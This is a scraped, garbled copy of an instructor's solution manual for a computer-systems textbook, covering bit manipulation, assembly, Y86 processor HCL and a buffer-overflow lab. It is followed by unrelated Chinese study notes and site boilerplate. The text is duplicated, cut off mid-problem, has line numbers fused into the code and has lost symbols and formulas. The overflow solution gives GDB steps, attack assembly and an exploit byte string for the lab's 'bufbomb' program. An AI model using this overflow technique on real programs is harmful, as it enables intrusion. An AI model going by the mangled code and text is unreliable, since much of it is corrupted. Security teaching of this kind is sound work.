MODE_E:24result=17;25break;26default:27result=-1;28}29return result;30}Problem3.34Solution:This problem gives students practice analyzing disassembled code.The switch statement contains all the features one can imagine—cases with multiple labels,holes in the range of possible case values,and cases that fall through.12CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1int switch_prob(int x)2{3int result=x;45switch(x){6case50:7case52:8result<<=2;9break;10case53:11result>>=2;12break;13case54:14result*=3;15/*Fall through*/16case55:17result*=result;18/*Fall through*/19default:20result+=10;21}2223return result;24}code/asm/varprod-ans.c 1int var_prod_ele_opt(var_matrix A,var_matrix B,int i,int k,int n) 2{3int*Aptr=&A[i*n];4int*Bptr=&B[k];5int result=0;6int cnt=n;78if(n<=0)9return result;1011do{12result+=(*Aptr)*(*Bptr);13Aptr+=1;14Bptr+=n;15cnt--;1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS13 16}while(cnt);1718return result;19}code/asm/structprob-ans.c 1typedef struct{2int idx;3int x[4];4}a_struct;14CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1/*Read input line and write it back*/2/*Code will work for any buffer size.Bigger is more time-efficient*/ 3#define BUFSIZE644void good_echo()5{6char buf[BUFSIZE];7int i;8while(1){9if(!fgets(buf,BUFSIZE,stdin))10return;/*End of file or error*/11/*Print characters in buffer*/12for(i=0;buf[i]&&buf[i]!=’\n’;i++)13if(putchar(buf[i])==EOF)14return;/*Error*/15if(buf[i]==’\n’){16/*Reached terminating newline*/17putchar(’\n’);18return;19}20}21}An alternative implementation is to use getchar to read the characters one at a time.Problem3.38Solution:Successfully mounting a buffer overflow attack requires understanding many aspects of machine-level pro-grams.It is quite intriguing that by supplying a string to one function,we can alter the behavior of another function that should always return afixed value.In assigning this problem,you should also give students a stern lecture about ethical computing practices and dispell any notion that hacking into systems is a desirable or even acceptable thing to do.Our solution starts by disassembling bufbomb,giving the following code for getbuf: 1080484f4<getbuf>:280484f4:55push%ebp380484f5:89e5mov%esp,%ebp480484f7:83ec18sub$0x18,%esp580484fa:83c4f4add$0xfffffff4,%esp680484fd:8d45f4lea0xfffffff4(%ebp),%eax78048500:50push%eax88048501:e86a ff ff ff call8048470<getxs>98048506:b801000000mov$0x1,%eax10804850b:89ec mov%ebp,%esp11804850d:5d pop%ebp12804850e:c3ret13804850f:90nopWe can see on line6that the address of buf is12bytes below the saved value of%ebp,which is4bytes below the return address.Our strategy then is to push a string that contains12bytes of code,the saved value1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS15 of%ebp,and the address of the start of the buffer.To determine the relevant values,we run GDB as follows:1.First,we set a breakpoint in getbuf and run the program to that point:(gdb)break getbuf(gdb)runComparing the stopping point to the disassembly,we see that it has already set up the stack frame.2.We get the value of buf by computing a value relative to%ebp:(gdb)print/x(%ebp+12)This gives0xbfffefbc.3.Wefind the saved value of register%ebp by dereferencing the current value of this register:(gdb)print/x*$ebpThis gives0xbfffefe8.4.Wefind the value of the return pointer on the stack,at offset4relative to%ebp:(gdb)print/x*((int*)$ebp+1)This gives0x8048528We can now put this information together to generate assembly code for our attack:1pushl$0x8048528Put correct return pointer back on stack2movl$0xdeadbeef,%eax Alter return value3ret Re-execute return4.align4Round up to125.long0xbfffefe8Saved value of%ebp6.long0xbfffefbc Location of buf7.long0x00000000PaddingNote that we have used the.align statement to get the assembler to insert enough extra bytes to use up twelve bytes for the code.We added an extra4bytes of0s at the end,because in some cases OBJDUMP would not generate the complete byte pattern for the data.These extra bytes(plus the termininating null byte)will overflow into the stack frame for test,but they will not affect the program behavior. Assembling this code and disassembling the object code gives us the following:10:6828850408push$0x804852825:b8ef be ad de mov$0xdeadbeef,%eax3a:c3ret4b:90nop Byte inserted for alignment.5c:e8ef ff bf bc call0xbcc00000Invalid disassembly.611:ef out%eax,(%dx)Trying to diassemble712:ff(bad)data813:bf00000000mov$0x0,%edi16CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS From this we can read off the byte sequence:6828850408b8ef be ad de c390e8ef ff bf bc ef ff bf00000000Problem3.39Solution:This problem is a variant on the asm examples in the text.The code is actually fairly simple.It relies on the fact that asm outputs can be arbitrary lvalues,and hence we can use dest[0]and dest[1]directly in the output list.code/asm/asmprobs-ans.c Problem3.40Solution:For this example,students essentially have to write the entire function in assembly.There is no(apparent) way to interface between thefloating point registers and the C code using extended asm.code/asm/fscale.c1.4.CHAPTER4:PROCESSOR ARCHITECTURE17 1.4Chapter4:Processor ArchitectureProblem4.32Solution:This problem makes students carefully examine the tables showing the computation stages for the different instructions.The steps for iaddl are a hybrid of those for irmovl and OPl.StageFetchrA:rB M PCvalP PCExecuteR rB valEPC updateleaveicode:ifun M PCDecodevalB RvalE valBMemoryWrite backR valMPC valPProblem4.34Solution:The following HCL code includes implementations of both the iaddl instruction and the leave instruc-tions.The implementations are fairly straightforward given the computation steps listed in the solutions to problems4.32and4.33.You can test the solutions using the test code in the ptest subdirectory.Make sure you use command line argument‘-i.’18CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1####################################################################2#HCL Description of Control for Single Cycle Y86Processor SEQ#3#Copyright(C)Randal E.Bryant,David R.O’Hallaron,2002#4####################################################################56##This is the solution for the iaddl and leave problems78####################################################################9#C Include’s.Don’t alter these#10#################################################################### 1112quote’#include<stdio.h>’13quote’#include"isa.h"’14quote’#include"sim.h"’15quote’int sim_main(int argc,char*argv[]);’16quote’int gen_pc(){return0;}’17quote’int main(int argc,char*argv[])’18quote’{plusmode=0;return sim_main(argc,argv);}’1920####################################################################21#Declarations.Do not change/remove/delete any of these#22#################################################################### 2324#####Symbolic representation of Y86Instruction Codes#############25intsig INOP’I_NOP’26intsig IHALT’I_HALT’27intsig IRRMOVL’I_RRMOVL’28intsig IIRMOVL’I_IRMOVL’29intsig IRMMOVL’I_RMMOVL’30intsig IMRMOVL’I_MRMOVL’31intsig IOPL’I_ALU’32intsig IJXX’I_JMP’33intsig ICALL’I_CALL’34intsig IRET’I_RET’35intsig IPUSHL’I_PUSHL’36intsig IPOPL’I_POPL’37#Instruction code for iaddl instruction38intsig IIADDL’I_IADDL’39#Instruction code for leave instruction40intsig ILEAVE’I_LEAVE’4142#####Symbolic representation of Y86Registers referenced explicitly##### 43intsig RESP’REG_ESP’#Stack Pointer44intsig REBP’REG_EBP’#Frame Pointer45intsig RNONE’REG_NONE’#Special value indicating"no register"4647#####ALU Functions referenced explicitly##### 48intsig ALUADD’A_ADD’#ALU should add its arguments4950#####Signals that can be referenced by control logic####################1.4.CHAPTER4:PROCESSOR ARCHITECTURE195152#####Fetch stage inputs#####53intsig pc’pc’#Program counter54#####Fetch stage computations#####55intsig icode’icode’#Instruction control code56intsig ifun’ifun’#Instruction function57intsig rA’ra’#rA field from instruction58intsig rB’rb’#rB field from instruction59intsig valC’valc’#Constant from instruction60intsig valP’valp’#Address of following instruction 6162#####Decode stage computations#####63intsig valA’vala’#Value from register A port64intsig valB’valb’#Value from register B port 6566#####Execute stage computations#####67intsig valE’vale’#Value computed by ALU68boolsig Bch’bcond’#Branch test6970#####Memory stage computations#####71intsig valM’valm’#Value read from memory727374####################################################################75#Control Signal Definitions.#76#################################################################### 7778################Fetch Stage################################### 7980#Does fetched instruction require a regid byte?81bool need_regids=82icode in{IRRMOVL,IOPL,IPUSHL,IPOPL,83IIADDL,84IIRMOVL,IRMMOVL,IMRMOVL};8586#Does fetched instruction require a constant word?87bool need_valC=88icode in{IIRMOVL,IRMMOVL,IMRMOVL,IJXX,ICALL,IIADDL};8990bool instr_valid=icode in91{INOP,IHALT,IRRMOVL,IIRMOVL,IRMMOVL,IMRMOVL,92IIADDL,ILEAVE,93IOPL,IJXX,ICALL,IRET,IPUSHL,IPOPL};9495################Decode Stage################################### 9697##What register should be used as the A source?98int srcA=[99icode in{IRRMOVL,IRMMOVL,IOPL,IPUSHL}:rA;20CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 101icode in{IPOPL,IRET}:RESP;1021:RNONE;#Don’t need register103];104105##What register should be used as the B source?106int srcB=[107icode in{IOPL,IRMMOVL,IMRMOVL}:rB;108icode in{IIADDL}:rB;109icode in{IPUSHL,IPOPL,ICALL,IRET}:RESP;110icode in{ILEAVE}:REBP;1111:RNONE;#Don’t need register112];113114##What register should be used as the E destination?115int dstE=[116icode in{IRRMOVL,IIRMOVL,IOPL}:rB;117icode in{IIADDL}:rB;118icode in{IPUSHL,IPOPL,ICALL,IRET}:RESP;119icode in{ILEAVE}:RESP;1201:RNONE;#Don’t need register121];122123##What register should be used as the M destination?124int dstM=[125icode in{IMRMOVL,IPOPL}:rA;126icode in{ILEAVE}:REBP;1271:RNONE;#Don’t need register128];129130################Execute Stage###################################131132##Select input A to ALU133int aluA=[134icode in{IRRMOVL,IOPL}:valA;135icode in{IIRMOVL,IRMMOVL,IMRMOVL}:valC;136icode in{IIADDL}:valC;137icode in{ICALL,IPUSHL}:-4;138icode in{IRET,IPOPL}:4;139icode in{ILEAVE}:4;140#Other instructions don’t need ALU141];142143##Select input B to ALU144int aluB=[145icode in{IRMMOVL,IMRMOVL,IOPL,ICALL,146IPUSHL,IRET,IPOPL}:valB;147icode in{IIADDL,ILEAVE}:valB;148icode in{IRRMOVL,IIRMOVL}:0;149#Other instructions don’t need ALU1.4.CHAPTER4:PROCESSOR ARCHITECTURE21151152##Set the ALU function153int alufun=[154icode==IOPL:ifun;1551:ALUADD;156];157158##Should the condition codes be updated?159bool set_cc=icode in{IOPL,IIADDL};160161################Memory Stage###################################162163##Set read control signal164bool mem_read=icode in{IMRMOVL,IPOPL,IRET,ILEAVE};165166##Set write control signal167bool mem_write=icode in{IRMMOVL,IPUSHL,ICALL};168169##Select memory address170int mem_addr=[171icode in{IRMMOVL,IPUSHL,ICALL,IMRMOVL}:valE;172icode in{IPOPL,IRET}:valA;173icode in{ILEAVE}:valA;174#Other instructions don’t need address175];176177##Select memory input data178int mem_data=[179#Value from register180icode in{IRMMOVL,IPUSHL}:valA;181#Return PC182icode==ICALL:valP;183#Default:Don’t write anything184];185186################Program Counter Update############################187188##What address should instruction be fetched at189190int new_pc=[191#e instruction constant192icode==ICALL:valC;193#Taken e instruction constant194icode==IJXX&&Bch:valC;195#Completion of RET e value from stack196icode==IRET:valM;197#Default:Use incremented PC1981:valP;199];22CHAPTER 1.SOLUTIONS TO HOMEWORK PROBLEMSME DMispredictE DM E DM M E D E DMGen./use 1W E DM Gen./use 2WE DM Gen./use 3W Figure 1.1:Pipeline states for special control conditions.The pairs connected by arrows can arisesimultaneously.code/arch/pipe-nobypass-ans.hcl1.4.CHAPTER4:PROCESSOR ARCHITECTURE232#At most one of these can be true.3bool F_bubble=0;4bool F_stall=5#Stall if either operand source is destination of6#instruction in execute,memory,or write-back stages7d_srcA!=RNONE&&d_srcA in8{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE}||9d_srcB!=RNONE&&d_srcB in10{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE}||11#Stalling at fetch while ret passes through pipeline12IRET in{D_icode,E_icode,M_icode};1314#Should I stall or inject a bubble into Pipeline Register D?15#At most one of these can be true.16bool D_stall=17#Stall if either operand source is destination of18#instruction in execute,memory,or write-back stages19#but not part of mispredicted branch20!(E_icode==IJXX&&!e_Bch)&&21(d_srcA!=RNONE&&d_srcA in22{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE}||23d_srcB!=RNONE&&d_srcB in24{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE});2526bool D_bubble=27#Mispredicted branch28(E_icode==IJXX&&!e_Bch)||29#Stalling at fetch while ret passes through pipeline30!(E_icode in{IMRMOVL,IPOPL}&&E_dstM in{d_srcA,d_srcB})&&31#but not condition for a generate/use hazard32!(d_srcA!=RNONE&&d_srcA in33{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE}||34d_srcB!=RNONE&&d_srcB in35{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE})&&36IRET in{D_icode,E_icode,M_icode};3738#Should I stall or inject a bubble into Pipeline Register E?39#At most one of these can be true.40bool E_stall=0;41bool E_bubble=42#Mispredicted branch43(E_icode==IJXX&&!e_Bch)||44#Inject bubble if either operand source is destination of45#instruction in execute,memory,or write back stages46d_srcA!=RNONE&&47d_srcA in{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE}|| 48d_srcB!=RNONE&&49d_srcB in{E_dstM,E_dstE,M_dstM,M_dstE,W_dstM,W_dstE};5024CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 52#At most one of these can be true.53bool M_stall=0;54bool M_bubble=0;code/arch/pipe-full-ans.hcl 1####################################################################2#HCL Description of Control for Pipelined Y86Processor#3#Copyright(C)Randal E.Bryant,David R.O’Hallaron,2002#4####################################################################56##This is the solution for the iaddl and leave problems78####################################################################9#C Include’s.Don’t alter these#10#################################################################### 1112quote’#include<stdio.h>’13quote’#include"isa.h"’14quote’#include"pipeline.h"’15quote’#include"stages.h"’16quote’#include"sim.h"’17quote’int sim_main(int argc,char*argv[]);’18quote’int main(int argc,char*argv[]){return sim_main(argc,argv);}’1920####################################################################21#Declarations.Do not change/remove/delete any of these#22#################################################################### 2324#####Symbolic representation of Y86Instruction Codes#############25intsig INOP’I_NOP’26intsig IHALT’I_HALT’27intsig IRRMOVL’I_RRMOVL’28intsig IIRMOVL’I_IRMOVL’29intsig IRMMOVL’I_RMMOVL’30intsig IMRMOVL’I_MRMOVL’31intsig IOPL’I_ALU’32intsig IJXX’I_JMP’33intsig ICALL’I_CALL’34intsig IRET’I_RET’1.4.CHAPTER4:PROCESSOR ARCHITECTURE25 36intsig IPOPL’I_POPL’37#Instruction code for iaddl instruction38intsig IIADDL’I_IADDL’39#Instruction code for leave instruction40intsig ILEAVE’I_LEAVE’4142#####Symbolic representation of Y86Registers referenced explicitly##### 43intsig RESP’REG_ESP’#Stack Pointer44intsig REBP’REG_EBP’#Frame Pointer45intsig RNONE’REG_NONE’#Special value indicating"no register"4647#####ALU Functions referenced explicitly##########################48intsig ALUADD’A_ADD’#ALU should add its arguments4950#####Signals that can be referenced by control logic##############5152#####Pipeline Register F##########################################5354intsig F_predPC’pc_curr->pc’#Predicted value of PC5556#####Intermediate Values in Fetch Stage###########################5758intsig f_icode’if_id_next->icode’#Fetched instruction code59intsig f_ifun’if_id_next->ifun’#Fetched instruction function60intsig f_valC’if_id_next->valc’#Constant data of fetched instruction 61intsig f_valP’if_id_next->valp’#Address of following instruction 6263#####Pipeline Register D##########################################64intsig D_icode’if_id_curr->icode’#Instruction code65intsig D_rA’if_id_curr->ra’#rA field from instruction66intsig D_rB’if_id_curr->rb’#rB field from instruction67intsig D_valP’if_id_curr->valp’#Incremented PC6869#####Intermediate Values in Decode Stage#########################7071intsig d_srcA’id_ex_next->srca’#srcA from decoded instruction72intsig d_srcB’id_ex_next->srcb’#srcB from decoded instruction73intsig d_rvalA’d_regvala’#valA read from register file74intsig d_rvalB’d_regvalb’#valB read from register file 7576#####Pipeline Register E##########################################77intsig E_icode’id_ex_curr->icode’#Instruction code78intsig E_ifun’id_ex_curr->ifun’#Instruction function79intsig E_valC’id_ex_curr->valc’#Constant data80intsig E_srcA’id_ex_curr->srca’#Source A register ID81intsig E_valA’id_ex_curr->vala’#Source A value82intsig E_srcB’id_ex_curr->srcb’#Source B register ID83intsig E_valB’id_ex_curr->valb’#Source B value84intsig E_dstE’id_ex_curr->deste’#Destination E register ID。
深入理解计算机系统答案(超高清电子版)
深⼊理解计算机系统答案(超⾼清电⼦版)Computer Systems:A Programmer’s Perspective Instructor’s Solution Manual1Randal E.BryantDavid R.O’HallaronDecember4,20032Chapter1Solutions to Homework ProblemsThe text uses two different kinds of exercises:Practice Problems.These are problems that are incorporated directly into the text,with explanatory solutions at the end of each chapter.Our intention is that students will work on these problems as they read the book.Each one highlights some particular concept.Homework Problems.These are found at the end of each chapter.They vary in complexity from simple drills to multi-week labs and are designed for instructors to give as assignments or to use as recitation examples.This document gives the solutions to the homework problems.1.1Chapter1:A Tour of Computer Systems1.2Chapter2:Representing and Manipulating InformationProblem2.40Solution:This exercise should be a straightforward variation on the existing code.2CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS1011void show_double(double x)12{13show_bytes((byte_pointer)&x,sizeof(double));14}code/data/show-ans.c 1int is_little_endian(void)3/*MSB=0,LSB=1*/4int x=1;56/*Return MSB when big-endian,LSB when little-endian*/7return(int)(*(char*)&x);8}1.2.CHAPTER2:REPRESENTING AND MANIPULATING INFORMATION3 There are many solutions to this problem,but it is a little bit tricky to write one that works for any word size.Here is our solution:code/data/shift-ans.c The above code peforms a right shift of a word in which all bits are set to1.If the shift is arithmetic,the resulting word will still have all bits set to1.Problem2.45Solution:This problem illustrates some of the challenges of writing portable code.The fact that1<<32yields0on some32-bit machines and1on others is common source of bugs.A.The C standard does not de?ne the effect of a shift by32of a32-bit datum.On the SPARC(andmany other machines),the expression x</doc/dde1f034f111f18583d05a59.html pute beyond_msb as2<<31.C.We cannot shift by more than15bits at a time,but we can compose multiple shifts to get thedesired effect.Thus,we can compute set_msb as2<<15<<15,and beyond_msb as set_msb<<1.Problem2.46Solution:This problem highlights the difference between zero extension and sign extension.It also provides an excuse to show an interesting trick that compilers often use to use shifting to perform masking and sign extension.A.The function does not perform any sign extension.For example,if we attempt to extract byte0fromword0xFF,we will get255,rather than.B.The following code uses a well-known trick for using shifts to isolate a particular range of bits and toperform sign extension at the same time.First,we perform a left shift so that the most signi?cant bit of the desired byte is at bit position31.Then we right shift by24,moving the byte into the proper position and peforming sign extension at the same time. 4CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 3int left=word<<((3-bytenum)<<3);4return left>>24;5}Problem2.48Solution:This problem lets students rework the proof that complement plus increment performs negation.We make use of the property that two’s complement addition is associative,commutative,and has additive/doc/dde1f034f111f18583d05a59.html ing C notation,if we de?ne y to be x-1,then we have?y+1equal to-y,and hence?y equals -y+1.Substituting gives the expression-(x-1)+1,which equals-x.Problem2.49Solution:This problem requires a fairly deep understanding of two’s complement arithmetic.Some machines only provide one form of multiplication,and hence the trick shown in the code here is actually required to perform that actual form.As seen in Equation2.16we have.The?nal term has no effect on the-bit representation of,but the middle term represents acode/data/uhp-ans.c Problem2.50Solution:1.2.CHAPTER2:REPRESENTING AND MANIPULATING INFORMATION5A.:x+(x<<2)B.:x+(x<<3)C.:(x<<4)-(x<<1)D.:(x<<3)-(x<<6)Problem2.51Solution:Bit patterns similar to these arise in many applications.Many programmers provide them directly in hex-adecimal,but it would be better if they could express them in more abstract ways.A..((1<B..((1<Problem2.52Solution:Byte extraction and insertion code is useful in many contexts.Being able to write this sort of code is an important skill to foster.code/data/rbyte-ans.c Problem2.53Solution:These problems are fairly tricky.They require generating masks based on the shift amounts.Shift value k equal to0must be handled as a special case,since otherwise we would be generating the mask by performing a left shift by32.6CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1unsigned srl(unsigned x,int k)2{3/*Perform shift arithmetically*/4unsigned xsra=(int)x>>k;5/*Make mask of low order32-k bits*/6unsigned mask=k?((1<<(32-k))-1):?0;78return xsra&mask;9}code/data/rshift-ans.c 1int sra(int x,int k)2{3/*Perform shift logically*/4int xsrl=(unsigned)x>>k;5/*Make mask of high order k bits*/6unsigned mask=k??((1<<(32-k))-1):0;78return(x<0)?mask|xsrl:xsrl;1.2.CHAPTER2:REPRESENTING AND MANIPULATING INFORMATION7B.(a)For,we have,,code/data/?oatge-ans.c 1int float_ge(float x,float y)2{3unsigned ux=f2u(x);4unsigned uy=f2u(y);5unsigned sx=ux>>31;6unsigned sy=uy>>31;78return9(ux<<1==0&&uy<<1==0)||/*Both are zero*/10(!sx&&sy)||/*x>=0,y<0*/11(!sx&&!sy&&ux>=uy)||/*x>=0,y>=0*/12(sx&&sy&&ux<=uy);/*x<0,y<0*/13},8CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS This exercise is of practical value,since Intel-compatible processors perform all of their arithmetic in ex-tended precision.It is interesting to see how adding a few more bits to the exponent greatly increases the range of values that can be represented.Description Extended precisionValueSmallest denorm.Largest norm.Problem2.59Solution:We have found that working through?oating point representations for small word sizes is very instructive. Problems such as this one help make the description of IEEE?oating point more concrete.Description8000Smallest value4700Largest denormalized———1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS91/*Compute2**x*/2float fpwr2(int x){4unsigned exp,sig;5unsigned u;67if(x<-149){8/*Too small.Return0.0*/9exp=0;10sig=0;11}else if(x<-126){12/*Denormalized result*/13exp=0;14sig=1<<(x+149);15}else if(x<128){16/*Normalized result.*/17exp=x+127;18sig=0;19}else{20/*Too big.Return+oo*/21exp=255;22sig=0;23}24u=exp<<23|sig;25return u2f(u);26}10CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS int decode2(int x,int y,int z){int t1=y-z;int t2=x*t1;int t3=(t1<<31)>>31;int t4=t3?t2;return t4;}Problem3.32Solution:This code example demonstrates one of the pedagogical challenges of using a compiler to generate assembly code examples.Seemingly insigni?cant changes in the C code can yield very different results.Of course, students will have to contend with this property as work with machine-generated assembly code anyhow. They will need to be able to decipher many different code patterns.This problem encourages them to think in abstract terms about one such pattern.1movl8(%ebp),%edx x2movl12(%ebp),%ecx y3movl%edx,%eax4subl%ecx,%eax result=x-y5cmpl%ecx,%edx Compare x:y6jge.L3if>=goto done:7movl%ecx,%eax8subl%edx,%eax result=y-x9.L3:done:A.When,it will compute?rst and then.When it just computes.B.The code for then-statement gets executed unconditionally.It then jumps over the code for else-statement if the test is false.C.then-statementt=test-expr;if(t)goto done;else-statementdone:D.The code in then-statement must not have any side effects,other than to set variables that are also set1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS11Problem3.33Solution:This problem requires students to reason about the code fragments that implement the different branches of a switch statement.For this code,it also requires understanding different forms of pointer dereferencing.A.In line29,register%edx is copied to register%eax as the return value.From this,we can infer that%edx holds result.B.The original C code for the function is as follows:1/*Enumerated type creates set of constants numbered0and upward*/2typedef enum{MODE_A,MODE_B,MODE_C,MODE_D,MODE_E}mode_t;34int switch3(int*p1,int*p2,mode_t action)5{6int result=0;7switch(action){8case MODE_A:12case MODE_B:13*p2+=*p1;14result=*p2;15break;16case MODE_C:17*p2=15;18result=*p1;19break;20case MODE_D:21*p2=*p1;22/*Fall Through*/23case MODE_E:24result=17;25break;26default:27result=-1;28}29return result;30}Problem3.34Solution:This problem gives students practice analyzing disassembled code.The switch statement contains all the features one can imagine—cases with multiple labels,holes in the range of possible case values,and cases that fall through.12CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1int switch_prob(int x)2{3int result=x;45switch(x){6case50:7case52:8result<<=2;9break;10case53:11result>>=2;15/*Fall through*/16case55:17result*=result;18/*Fall through*/19default:20result+=10;21}2223return result;24}code/asm/varprod-ans.c 1int var_prod_ele_opt(var_matrix A,var_matrix B,int i,int k,int n) 2{3int*Aptr=&A[i*n];4int*Bptr=&B[k];5int result=0;6int cnt=n;78if(n<=0)9return result;1011do{12result+=(*Aptr)*(*Bptr);13Aptr+=1;14Bptr+=n;1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS13 16}while(cnt); 1718return result;19}code/asm/structprob-ans.c 1typedef struct{2int idx;3int x[4];4}a_struct;14CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1/*Read input line and write it back*/ 2/*Code will work for any buffer size.Bigger is more time-efficient*/ 3#define BUFSIZE644void good_echo()5{6char buf[BUFSIZE];7int i;8while(1){9if(!fgets(buf,BUFSIZE,stdin))10return;/*End of file or error*/11/*Print characters in buffer*/12for(i=0;buf[i]&&buf[i]!=’\n’;i++)13if(putchar(buf[i])==EOF)14return;/*Error*/15if(buf[i]==’\n’){16/*Reached terminating newline*/17putchar(’\n’);18return;19}20}21}An alternative implementation is to use getchar to read the characters one at a time.Problem3.38Solution:Successfully mounting a buffer over?ow attack requires understanding many aspects of machine-level pro-grams.It is quite intriguing that by supplying a string to one function,we can alter the behavior of another function that should always return a? xed value.In assigning this problem,you should also give students a stern lecture about ethical computing practices and dispell any notion that hacking into systems is a desirable or even acceptable thing to do.Our solution starts by disassembling bufbomb,giving the following code for getbuf: 1080484f4:280484f4:55push%ebp380484f5:89e5mov%esp,%ebp480484f7:83ec18sub$0x18,%esp580484fa:83c4f4add$0xfffffff4,%esp680484fd:8d45f4lea0xfffffff4(%ebp),%eax78048500:50push%eax88048501:e86a ff ff ff call804847098048506:b801000000mov$0x1,%eax10804850b:89ec mov%ebp,%esp11804850d:5d pop%ebp12804850e:c3retWe can see on line6that the address of buf is12bytes below the saved value of%ebp,which is4bytes1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS15 of%ebp,and the address of the start of the buffer.To determine the relevant values,we run GDB as follows:1.First,we set a breakpoint in getbuf and run the program to that point:(gdb)break getbuf(gdb)runComparing the stopping point to the disassembly,we see that it has already set up the stack frame.2.We get the value of buf by computing a value relative to%ebp:(gdb)print/x(%ebp+12)This gives0xbfffefbc.3.We?nd the saved value of register%ebp by dereferencing the current value of this register:(gdb)print/x*$ebpThis gives0xbfffefe8.4.We?nd the value of the return pointer on the stack,at offset4relative to%ebp:(gdb)print/x*((int*)$ebp+1)This gives0x8048528We can now put this information together to generate assembly code for our attack:1pushl$0x8048528Put correct return pointer back on stack2movl$0xdeadbeef,%eax Alter return value3ret Re-execute return4.align4Round up to125.long0xbfffefe8Saved value of%ebp6.long0xbfffefbc Location of buf7.long0x00000000PaddingNote that we have used the.align statement to get the assembler to insert enough extra bytes to use up twelve bytes for the code.We added an extra4bytes of0s at the end,because in some cases OBJDUMP would not generate the complete byte pattern for the data.These extra bytes(plus the termininating null byte)will over?ow into the stack frame for test,but they will not affect the program behavior. Assembling this code and disassembling the object code gives us the following:10:6828850408push$0x804852825:b8ef be ad de mov$0xdeadbeef,%eax3a:c3ret4b:90nop Byte inserted for alignment.5c:e8ef ff bf bc call0xbcc00000Invalid disassembly.611:ef out%eax,(%dx)Trying to diassemble712:ff(bad)data16CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS From this we can read off the byte sequence:Problem3.39Solution:This problem is a variant on the asm examples in the text.The code is actually fairly simple.It relies on the fact that asm outputs can be arbitrary lvalues,and hence we can use dest[0]and dest[1]directly in the output list.code/asm/asmprobs-ans.c Problem3.40Solution:For this example,students essentially have to write the entire function in assembly.There is no(apparent) way to interface between the?oating point registers and the C code using extended asm.code/asm/fscale.c1.4.CHAPTER4:PROCESSOR ARCHITECTURE17 1.4Chapter4:Processor ArchitectureProblem4.32Solution:This problem makes students carefully examine the tables showing the computation stages for the different instructions.The steps for iaddl are a hybrid of those for irmovl and OPl.StageFetchrA:rB M PCvalP PCExecuteR rB valEPC updateleaveicode:ifun M PCDecodevalB RvalE valBMemoryWrite backR valMPC valPProblem4.34Solution:The following HCL code includes implementations of both the iaddl instruction and the leave instruc-tions.The implementations are fairly straightforward given the computation steps listed in the solutions to problems4.32and4.33.You can test the solutions using the test code in the ptest subdirectory.Make sure you use command line argument‘-i.’。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
int int_shifts_are_arithmetic(){int x = -1;return (x>>1) == -1;}2.63对于sra,主要的工作是将xrsl的第w-k-1位扩展到前面的高位。
这个可以利用取反加1来实现,不过这里的加1是加1<<(w-k-1)。
如果x的第w-k-1位为0,取反加1后,前面位全为0,如果为1,取反加1后就全是1。
最后再使用相应的掩码得到结果。
对于srl,注意工作就是将前面的高位清0,即xsra & (1<<(w-k) - 1)。
额外注意k==0时,不能使用1<<(w-k),于是改用2<<(w-k-1)。
int sra(int x, int k){int xsrl = (unsigned) x >> k;int w = sizeof(int) << 3;unsigned z = 1 << (w-k-1);unsigned mask = z - 1;unsigned right = mask & xsrl;unsigned left = ~mask & (~(z&xsrl) + z);return left | right;}int srl(unsigned x, int k){int xsra = (int) x >> k;int w = sizeof(int)*8;unsigned z = 2 << (w-k-1);return (z - 1) & xsra;}INT_MIN);}2.74对于有符号整数相减,溢出的规则可以总结为:t = a-b;如果a, b 同号,则肯定不会溢出。
如果a>=0 && b<0,则只有当t<=0时才算溢出。
如果a<0 && b>=0,则只有当t>=0时才算溢出。
不过,上述t肯定不会等于0,因为当a,b不同号时:1) a!=b,因此a-b不会等于0。
2) a-b <= abs(a) + abs(b) <= abs(TMax) + abs(TMin)=(2^w - 1)所以,a,b异号,t,b同号即可判定为溢出。
int tsub_ovf(int x, int y){int w = sizeof(int)<<3;int t = x - y;x>>=(w-1);y>>=(w-1);t>>=(w-1);return (x != y) && (y == t);}顺便整理一下汇编中CF,OF的设定规则(个人总结,如有不对之处,欢迎指正)。
t = a + b;CF: (unsigned t) < (unsigned a) 进位标志OF: (a<0 == b<0) && (t<0 != a<0)t = a - b;CF: (a<0 && b>=0) || ((a<0 == b<0) && t<0) 退位标志OF: (a<0 != b<0) && (b<0 == t<0)汇编中,无符号和有符号运算对条件码(标志位)的设定应该是相同的,但是对于无符号比较和有符号比较,其返回值是根据不同的标志位进行的。
详情可以参考第三章3.6.2节。
2.75根据2-18,不难推导, (x'*y')_h = (x*y)_h + x(w-1)*y + y(w-1)*x。
